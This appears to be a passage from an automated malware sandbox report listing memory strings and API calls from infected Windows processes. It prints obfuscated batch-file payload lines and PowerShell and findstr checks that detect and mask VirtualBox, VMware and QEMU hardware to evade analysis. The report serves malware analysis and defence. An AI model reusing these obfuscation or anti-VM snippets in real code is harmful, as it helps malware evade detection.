OfZYXlarfrWYbkkXYfXsybOFkxIgDDtrMlPE%e%BUZcsXAdLTStJXESJBINqtOACUNBYFmPvGwegVZBBKUqEpwFZAIkDcohgyAyjYfgHcXdBAMOBhmFz%*%yVmxhCxWbmtroYHvBsCENJBrseyOUJvPIIICnbbwIjFQELnCesaPJaLOuUeddIcsRDJFqehAqgWEd%s%LMHQWJBIGgHXTisWXsZgnYbcHmalAyDegLJhxnhYBJkxcIxVPDsNXxPMLEiKIqihCDQhykyKlaFDN%s%EaZPfvWgQhIWWwTewqlBdUyRpwFfHCWSlYgEjVDUlbMwhkCNFGOKucKKBhzIQRynkQKYqoUBMqpci%"
Source: svchost.exe, 00000024.00000000.1562585901.000002A76C0B6000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: dowvmci
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: VMware
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "AdapterCompatibility" -or $pr.Name -eq "Description" -or $pr.Name -eq "InfSection" -or $pr.Name -eq "VideoProcessor") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VirtualBox' -or $pr.Value -match 'VMware' -or $pr.Value -match 'Oracle Corporation' -or $pr.Value -match 'Microsoft Basic Display Adapter'))
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Name" -or $pr.Name -eq "PNPDeviceID" -or $pr.Name -eq "Service" -or $pr.Name -eq "Description") -and ($pr.Value -match 'VEN_80EE' -or $pr.Value -match 'VEN_15AD' -or $pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMWare' -or $pr.Value -match 'VMware' -or $pr.Value -match '82801FB' -or $pr.Value -match '82441FX' -or $pr.Value -match '82371SB' -or $pr.Value -match 'OpenHCD'))
Source: powershell.exe, 00000023.00000002.3376787099.000002131465E000.00000004.00000001.00020000.00000000.sdmp, product.bat, $rbx-CO2.bat.19.drBinary or memory string: !FSMEdrvzOwmtyaWzrcxQSpDVLdBMVmlazyTmwjFejByhXwmvrJMZpBbpoRTaQIDCllTahKdiwsGqRvXpQfvmzlLYxEYFqFoBXWWLCloHGECWUKySTEkKnrcZAVDDMxRR! "f%COAPlpSZrUfNOYjAKqVRRPHkbDHThLzDwkCXTUsIfdkGlfXUCfMlybXNgqNHIYSGuBrDvlGPY%M%nLNEaYWFMqcYofvnPQDhKahlElKNtzryXmkpkigrRbVHPIgvWqGudIonEBaOnilnYDbbUfdGK%t%lpIezvVfoRdSXvoYXKIireJQIJmHeBQnZJRtFjegeJYriuaiMdXuuyshGSvQjobNaQToDVsOF%K%CdIfrHoIdUaEwSArJNNNoWQHkrrAMEQKiOSvJcokhiguajDXsWTiFarGnbUapNVydqvHaeHHy%D%CGgPwHaNtiPKIfhxmiIhnUtmHqKOWXopmJculQRtTnVFfOvknkNWZzkImTifWmRwTAyYdNmwr%X%ooaYOhTUzBLksqMytirHLxHwzLEpwhzYrEKlkJxMplwLflBkLzJFUOGRGEydCDxsbMTNFBoKK%X%FszaVqnjuEWyUeCYTEGlujLNeJssOEklZUpwgQKnkTiZAUgIqOMWHzqvGLWmXVvPtLzZPfRcT%d%saBbMmkCKbZSoDAETQuUyqpxsFPuhTlWJcpyPtTyLJnTwXfhYvVoxhvcKdJhxPvQQcilobPzX%C%ViPcwbuzIwMXWzCHmOLKLbWnwdtPUSXFwrBYFZoboIOtJTTCGEbndPlUmBGsIFFPygBFYDbnz%B%JvdmDECkQjpQKBHfHMesVtIcYUDsnEcCONutiHJWdiRwpZNEUArRWUEqNaoIbkWlgNcXhnWZc%q%ipMBmNZhYxMnlFTjdGhtbVSmFqCWQxGDrOOFROBnoAdNjYUhiNdHPGbmwAWVldqARjWxQosof%T%TeARfcHwuNctYOKNBiqSFclkCVacwrTvPCVCAuryozQpnhSulKogbwzRTppjbEZdTHEwThmhR%L%RDglVXudGQMcNusceJkfhxKANwGDvBdyhpjStFXsUgvOmbgnluOybbJuTGyzrRHeMoUxkAIyL%T%SkabVnMpsrbMFwgFOYNhybdzrbYgIcKLqNjRJtYsLjYAFrhROSvCVrmQhBKToFHpGqwSnoWva%M%uwpdDTZUhsQHiPZAsKhIeefBITpVpDzVaBBVXNEIKZhnRIxAxrVEOMWqqNuJEeFDSUHGoeDEf%F%zYeWSKavOyXIVgnFkEjtUdGtEuWbQmsOqypORtxdtoPGHUXOtbdztllvrKsyNZEBfjrwRzORh%x%gZFnaLJwiHPiTufmTwgaZpuKnAyDBWUnmsnlFhrYJbFrOtlOljXcHQhQEVZznfVlNCWBhUHLf%B%hrXKdVUpKrrZRGvkwGKhSLDgtDmxKGrCmWzzkgBafkCNEmVWBqKnWDnvNQqzIxEdaOMVgVapf%u%JcIiPChIqVuVdFIJdLtQbrHFzNPzaPFqvhmBFnYoiRsBkhWiemcjHzesucJcMHHAqdAVshdQN%T%eIjZgurQHvONvJVdUgCDVCAjRlgHbPWilvCQUsoHrlfmTNUuESybBnRChZiVoKPRyFCagfiBS%=*%lKxopeqMcirVHYDaJUkstHwnNokUnzKWiGbheTKeFBIGACYEwgvnqzBEnkAbTvyCyuMbWwWPkgNRZ%.%PMlpGyhewGJexTUtIkjdfigQXHakFckLJFyxpMnXqybNdWzCbwCWEOTGFusYyXytvYvRvweWWmNHg%C%sNaixijAnhVMRSUtpysaIsfAHgFsGZsamAmHrPaPoThQAfDEkCHNuGyaHAArDRUoOUzrFmczyDLOk%*%oaCDbidrFGFbmZRoJmxYTcGFmYXAioRUJQtAYNBJQWjoTptmkkPqoPqmtWrckDjqOKrvGrqVKOiWS%o%sMWFLpXyAGTzhgcwzymNTzjYXGTUUGAHutbkuwzomRnexVykoykpVjYSCXHevdEUgmfNeSccZYAbm%m%fAchIGvvkLlvjHwPuSjmsXlQKgwwhpXIXGxxFWMxizVATsVkFnFfrOTholxCjZnVOCxCjZjxgLeTb%*%LWsklQUKSqiMpjuzknilaLrUsaGdhZFKZgCoesYitlWmpQTPPXWyVIbZFxRkkQCTLyMjGfuRoaRPP%p%fFCgQojdgPreCIHAOYDIdBRdKjKDekVQlkARpduCsPEIuedwNrAbohLEOywHDGZWTBSsiPlKDbpnW%r%iIFfnPMJTCeyWdQGMYMQHPTmLoXgQxnRyHFPRBqQmmaZOTlLudRdDwptPtuZSGTvpnapybPlHVEuP%*%UyRclMMGjobrmaygqYGtEJASWntoFvIRUDUVDXGUhOfZYXlarfrWYbkkXYfXsybOFkxIgDDtrMlPE%e%BUZcsXAdLTStJXESJBINqtOACUNBYFmPvGwegVZBBKUqEpwFZAIkDcohgyAyjYfgHcXdBAMOBhmFz%*%yVmxhCxWbmtroYHvBsCENJBrseyOUJvPIIICnbbwIjFQELnCesaPJaLOuUeddIcsRDJFqehAqgWEd%s%LMHQWJBIGgHXTisWXsZgnYbcHmalAyDegLJhxnhYBJkxcIxVPDsNXxPMLEiKIqihCDQhykyKlaFDN%s%EaZPfvWgQhIWWwTewqlBdUyRpwFfHCWSlYgEjVDUlbMwhkCNFGOKucKKBhzIQRynkQKYqoUBMqpci%"
Source: lsass.exe, 00000010.00000000.1416813718.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicvssNT SERVICE
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.drBinary or memory string: VMwareVirtual disk6000c2942fce4d06663969f532e45d1a8
Source: Microsoft-Windows-Partition%4Diagnostic.evtx.36.drBinary or memory string: VMwareVirtual disk2.06000c2942fce4d06663969f532e45d1aPCI Slot 32 : Bus 2 : Device 0 : Function 0 : Adapter 0 : Port 0 : Target 0 : LUN 0PCI\VEN_1000&DEV_0054&SUBSYS_197615AD&REV_01\3&218e0f40&0&00
Source: cmd.exe, 00000016.00000003.1484014593.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1484369314.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1482211032.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1487300764.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1486881918.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1484505880.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1483753694.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1485499049.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1462971364.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1483317075.000001B68B78C000.00000004.00000020.00020000.00000000.sdmp, cmd.exe, 00000016.00000003.1482696640.000001B68B78C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: /i /c:"QEMU HARDDISK" /c:"WDS100T2B0A" /c:"DADY HARDDISK"
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: storahciNECVMWarVMware SATA CD00
Source: dwm.exe, 00000012.00000002.3415712940.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Bus\0000SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000PCI\VEN_8
Source: lsass.exe, 00000010.00000002.3348263059.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, lsass.exe, 00000010.00000000.1416730879.0000017D2CE13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000000.1419270994.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.3333488909.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000000.1506765871.000001EF0502F000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001C.00000002.3339558225.000001EF0502B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000000.1513638479.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001D.00000002.3348737864.000002287A040000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000002.3339816682.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000001E.00000000.1520537730.000001B94D436000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 00000024.00000002.3343779127.000002A769A2B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: lsass.exe, 00000010.00000000.1416813718.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicshutdownNT SERVICE
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.drBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc@
Source: Microsoft-Windows-StorageSpaces-Driver%4Operational.evtx.36.drBinary or memory string: JVMwareVirtual disk6000c298128b8c02a71a2474aeb5f3dc8
Source: powershell.exe, 00000023.00000002.3376787099.000002131465E000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: !fsVzlMERNFVIOdMffLMuDnFTWkHILViMKSPrCtIRFTzMgrMSQxGMewASN! "N%fRgNnfhhsCkdxTDuXhKOLLUpnBHbIUjwQkGknBUEJgFaDqGMKRIwIx%P%wuWQzMygyytOmnmshwnfeEfUMXUUqRmMNtOmnwbhgDIhGPdtArKljC%c%tRoceCRDPGlGaTyafKvfZBWYnWTBuZhaCkZWYlsyqDNbVaPkUzlZQe%s%DSUpOiIqjQzldQTBcTsWOvNVdnhJGUNhjxGhcIwkPatXBJWYqtxrHU%M%qheYlAaZJocrbFjMztxhgOcQttrisnxvAphyddwVjQqfUkIqPETeUz%b%NCfnESjSHwRGRLyKJvWBYqxXVjLatNttBaBFtPyEMriUnotWSeVyht%t%BxeirvhizTcyfRjSrTWsOGhCJHQOioSVlhyeAkxdxDSpSPiBMZNbBP%o%EUpCzKFsZkbhmYsfrgwTUlOSKTyocjBQtwCDPYLMyeDHnKCkiHHGFI%h%UtgwRFmqqQJkOPvPptuJvQHgEarnfuCUkKCjwshgAhONYdVNPtrolW%K%ndMZRRoYkVoOadmmsXloinbTiBeDyMdnIoxyxxBqSCXTzkcSACaucX%R%OacSRqNKAySafMGOPVwVwFpiuXyldVLJkLzxwEFlDhcybzeqmMNfYh%n%AiKUyTRBGFNiPumirkplsoDRgVTiZrhFKdkrMBgMtbBxLSJJeduDQN%Y%OlFSNCaIBoxhyLjVwPdDRqNggoljeWXEPXpZLTODLKAmZDuXAiHEzn%D%WyyyMyrQEFqSsAwkjCbzRgQAhCUoJVotfCbRAnhpmUgUWgkTAqYeCZ%O%vQHYrjEchJqXNQzFJWvLnWZVEasaNsWjQggljCVXLkMxDYsuuVGcJQ%t%MyQLtqRDpOMggHKnwhayacjCsFHXFSMTAauHvxiFfhVYKwRLKhyzcl%e%PJontOJTXwcSGgncSYYvtThlSVOVnytnRpkLsheuVljyVRQLyHoAAH%G%SWBdvxZNFzcPbrWBJKUDzhJJqafdxGjTMjwnkpMGuiFKvgQyOWYEGW%n%iKmRNusWpZpjcSUIrtXnjrCZnjkGoAHFnPbMbsCsnxSFumdXDfEEHs%l%NQhmEDkMIPrKWnRiHZRFaLzXFbgmciWdYUbkEOOYiBPdnKqPgvyFMb%F%scrkHCwXJzSoMblGDTlSxyVwJUKqgGKqqWCZTuglBkRpkZYpEASEuU%E%ETgVAMSgQcPBXPzlNjNZqmGGlKWvLGOfWwrITXTttvtOzIbiPsMIRu%t%DsnzJPQwuknKFByQsPptGVSRgDJOFsTgnCSYvtodDWajAPdzKZaWty%l%NIAvtfgcQbrhwcIzvYBmQJUIqqAjeGsWMPPkyZaiXAgZRttbRkDcvh%=o%dNRecFWYkJuuGmxbvXtopDVRXXzsTdpBFhLwGVYCaCWpxYNOtjhebSrzSagfgEehuTPyB%+%buAZRoNHGtZjLYJVkzNPlEGOTvvxOVDjonsPGfkDESmGhVvGvljubIpwOMgvSpSKQQVxF%4%UofojltsZHXaPcDLjhFXWaUZPLpZBQqZXaAWefRxVeOeiudnpYGIpAJUugyyVuRjqXcOB%Q%GHdqicRlPQuHbJCjHKxqGCYHsBAnFNksoLIrDsgxRIEpeRTKoZJnFxVeJwXGCEFbFcsqb%=%lGpDazYYIDBHPYGeXNRQEHgvzUmcCJbzDJdtuJEYXfbTvZMGZXIpBAwDzTdfmVvYBcefU%=%nKoiTTyGnZAhGcFbMXdnATAFzLbJcstVHMMmugHGXXmUDXGSQXPeaRuukIJhRPDVGFATq%'%sHFqwqCGGcBeiTfCoUPrscLxAPitrnYwMCypjOEBRNDGhcJVysrKLCYpViPHhjoseesGu%)%PtAqnAEyfpxgmUZWnLkEitaYXtIzlCcKcBJYQuxbtQQTrAVoovQthclvtBtUSfnDmNdLl%;%bgToikrDhGwytkQLJCapnFoaDjoDnGExkdnpWeZRTSlUXvzVxRCldvYwRTKYWOqAcYnpX%%APEDivvttdhKtgvdtuPfRydtaVfBLSYijYWcXHUZCcxPDoDHUwJEykfcLkDnqTIBeYBvk%$%tgLzPCObnQLryHoiuJYSUqMeHJJuVLEMixAqXeJIrbyuRVRlutKpDCpdtHSfStfClZjbg%b%XkpapATSsmLRxaCbpjFhxXqmDQXVWiSMQfwivoocwlavhnutDAWPETJZUcwzCYWjtZbsE%q%tFaVCLmWUfpvErvmciXvwnsROAypRchmbPjUVUbixcZXhdXGAWqReXhgnjgcnWfSXduPi%y%ArigPYtouKLCSOULqieHdHMOYVAXgZdJixaFiKoZNRSyuAvilhHVphfSEthUxwhvHbuuN%"
Source: Microsoft-Windows-Storage-Storport%4Operational.evtx.36.drBinary or memory string: nonicVMware Virtual disk 6000c2942fce4d06663969f532e45d1a
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: $value = $pr.Value.replace("VBOX", $value).replace("VBox", $value).replace("VMWARE", $value).replace("VMware", $value).replace("VirtualBox", $value).replace("Oracle Corporation", $value).replace("Microsoft Basic Display Adapter", $value)
Source: svchost.exe, 0000002A.00000002.3341685727.000002517802B000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTVMWare
Source: svchost.exe, 0000002E.00000000.1607134927.00000297A5600000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcUmRdpServiceDsSvcfhsvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionsvsvcStorSvcWwanSvcvmicvssDevQueryBrokerNgcSvcsysmainNetmanTabletInputServicePcaSvcDisplayEnhancementServiceIPxlatCfgSvcDeviceAssociationServiceNcbServiceEmbeddedModeSensorServicewlansvcCscServiceWPDBusEnumMixedRealityOpenXRSvc
Source: lsass.exe, 00000010.00000000.1416813718.0000017D2CE91000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: pvmicheartbeatNT SERVICE
Source: $rbx-CO2.bat.19.drBinary or memory string: !fsVzlMERNFVIOdMffLMuDnFTWkHILViMKSPrCtIRFTzMgrMSQxGMewASN! "N%fRgNnfhhsCkdxTDuXhKOLLUpnBHbIUjwQkGknBUEJgFaDqGMKRIwIx%P%wuWQzMygyytOmnmshwnfeEfUMXUUqRmMNtOmnwbhgDIhGPdtArKljC%c%tRoceCRDPGlGaTyafKvfZBWYnWTBuZhaCkZWYlsyqDNbVaPkUzlZQe%s%DSUpOiIqjQzldQTBcTsWOvNVdnhJGUNhjxGhcIwkPatXBJWYqtxrHU%M%qheYlAaZJocrbFjMztxhgOcQttrisnxvAphyddwVjQqfUkIqPETeUz%b%NCfnESjSHwRGRLyKJvWBYqxXVjLatNttBaBFtPyEMriUnotWSeVyht%t%BxeirvhizTcyfRjSrTWsOGhCJHQOioSVlhyeAkxdxDSpSPiBMZNbBP%o%EUpCzKFsZkbhmYsfrgwTUlOSKTyocjBQtwCDPYLMyeDHnKCkiHHGFI%h%UtgwRFmqqQJkOPvPptuJvQHgEarnfuCUkKCjwshgAhONYdVNPtrolW%K%ndMZRRoYkVoOadmmsXloinbTiBeDyMdnIoxyxxBqSCXTzkcSACaucX%R%OacSRqNKAySafMGOPVwVwFpiuXyldVLJkLzxwEFlDhcybzeqmMNfYh%n%AiKUyTRBGFNiPumirkplsoDRgVTiZrhFKdkrMBgMtbBxLSJJeduDQN%Y%OlFSNCaIBoxhyLjVwPdDRqNggoljeWXEPXpZLTODLKAmZDuXAiHEzn%D%WyyyMyrQEFqSsAwkjCbzRgQAhCUoJVotfCbRAnhpmUgUWgkTAqYeCZ%O%vQHYrjEchJqXNQzFJWvLnWZVEasaNsWjQggljCVXLkMxDYsuuVGcJQ%t%MyQLtqRDpOMggHKnwhayacjCsFHXFSMTAauHvxiFfhVYKwRLKhyzcl%e%PJontOJTXwcSGgncSYYvtThlSVOVnytnRpkLsheuVljyVRQLyHoAAH%G%SWBdvxZNFzcPbrWBJKUDzhJJqafdxGjTMjwnkpMGuiFKvgQyOWYEGW%n%iKmRNusWpZpjcSUIrtXnjrCZnjkGoAHFnPbMbsCsnxSFumdXDfEEHs%l%NQhmEDkMIPrKWnRiHZRFaLzXFbgmciWdYUbkEOOYiBPdnKqPgvyFMb%F%scrkHCwXJzSoMblGDTlSxyVwJUKqgGKqqWCZTuglBkRpkZYpEASEuU%E%ETgVAMSgQcPBXPzlNjNZqmGGlKWvLGOfWwrITXTttvtOzIbiPsMIRu%t%DsnzJPQwuknKFByQsPptGVSRgDJOFsTgnCSYvtodDWajAPdzKZaWty%l%NIAvtfgcQbrhwcIzvYBmQJUIqqAjeGsWMPPkyZaiXAgZRttbRkDcvh%=o%dNRecFWYkJuuGmxbvXtopDVRXXzsTdpBFhLwGVYCaCWpxYNOtjhebSrzSagfgEehuTPyB%+%buAZRoNHGtZjLYJVkzNPlEGOTvvxOVDjonsPGfkDESmGhVvGvljubIpwOMgvSpSKQQVxF%4%UofojltsZHXaPcDLjhFXWaUZPLpZBQqZXaAWefRxVeOeiudnpYGIpAJUugyyVuRjqXcOB%Q%GHdqicRlPQuHbJCjHKxqGCYHsBAnFNksoLIrDsgxRIEpeRTKoZJnFxVeJwXGCEFbFcsqb%=%lGpDazYYIDBHPYGeXNRQEHgvzUmcCJbzDJdtuJEYXfbTvZMGZXIpBAwDzTdfmVvYBcefU%=%nKoiTTyGnZAhGcFbMXdnATAFzLbJcstVHMMmugHGXXmUDXGSQXPeaRuukIJhRPDVGFATq%'%sHFqwqCGGcBeiTfCoUPrscLxAPitrnYwMCypjOEBRNDGhcJVysrKLCYpViPHhjoseesGu%)%PtAqnAEyfpxgmUZWnLkEitaYXtIzlCcKcBJYQuxbtQQTrAVoovQthclvtBtUSfnDmNdLl%;%bgToikrDhGwytkQLJCapnFoaDjoDnGExkdnpWeZRTSlUXvzVxRCldvYwRTKYWOqAcYnpX%%APEDivvttdhKtgvdtuPfRydtaVfBLSYijYWcXHUZCcxPDoDHUwJEykfcLkDnqTIBeYBvk%$%tgLzPCObnQLryHoiuJYSUqMeHJJuVLEMixAqXeJIrbyuRVRlutKpDCpdtHSfStfClZjbg%b%XkpapATSsmLRxaCbpjFhxXqmDQXVWiSMQfwivoocwlavhnutDAWPETJZUcwzCYWjtZbsE%q%tFaVCLmWUfpvErvmciXvwnsROAypRchmbPjUVUbixcZXhdXGAWqReXhgnjgcnWfSXduPi%y%ArigPYtouKLCSOULqieHdHMOYVAXgZdJixaFiKoZNRSyuAvilhHVphfSEthUxwhvHbuuN%"
Source: svchost.exe, 00000011.00000002.3333488909.0000022F4AC13000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000@3
Source: svchost.exe, 0000001A.00000000.1476993256.000002234AE79000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlltion1301
Source: svchost.exe, 00000024.00000002.3413741329.000002A76AF8C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: if(($pr.Name -eq "DeviceId" -or $pr.Name -eq "Caption" -or $pr.Name -eq "Model" -or $pr.Name -eq "PNPDeviceID") -and ($pr.Value -match 'VBOX' -or $pr.Value -match 'VBox' -or $pr.Value -match 'VMWARE' -or $pr.Value -match 'VMware'))
Source: dwm.exe, 00000012.00000002.3415712940.00000262ED7EF000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_14-616
Source: C:\Windows\System32\dllhost.exeAPI call chain: ExitProcess graph end nodegraph_14-702
Source: C:\Windows\System32\wbem\WMIC.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E1E3C LoadLibraryA,GetProcAddress,SleepEx,15_2_000001CA7D1E1E3C
Source: C:\Windows\System32\dllhost.exeCode function: 14_2_0000000140001CF0 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapAlloc,K32EnumProcesses,OpenProcess,K32EnumProcessModulesEx,ReadProcessMemory,CloseHandle,GetProcessHeap,HeapFree,GetProcessHeap,RtlFreeHeap,14_2_0000000140001CF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D1E84B0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1ECD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D1ECD80
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D1E8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001CA7D1E8814
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D2184B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D2184B0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D21CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D21CD80
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D218814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001CA7D218814
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D2984B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D2984B0
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D29CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_000001CA7D29CD80
Source: C:\Windows\System32\winlogon.exeCode function: 15_2_000001CA7D298814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_000001CA7D298814
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD5CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000017D2DD5CD80
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD584B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,16_2_0000017D2DD584B0
Source: C:\Windows\System32\lsass.exeCode function: 16_2_0000017D2DD58814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,16_2_0000017D2DD58814
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B928814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,17_2_0000022F4B928814
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B92CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000022F4B92CD80
Source: C:\Windows\System32\svchost.exeCode function: 17_2_0000022F4B9284B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,17_2_0000022F4B9284B0
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CA8814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00000262F1CA8814
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CACD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1CACD80
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1CA84B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1CA84B0
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D08814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00000262F1D08814
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D0CD80 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1D0CD80
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D084B0 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,18_2_00000262F1D084B0
Source: C:\Windows\System32\dwm.exeCode function: 18_2_00000262F1D38814 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,18_2_00000262F1D38814
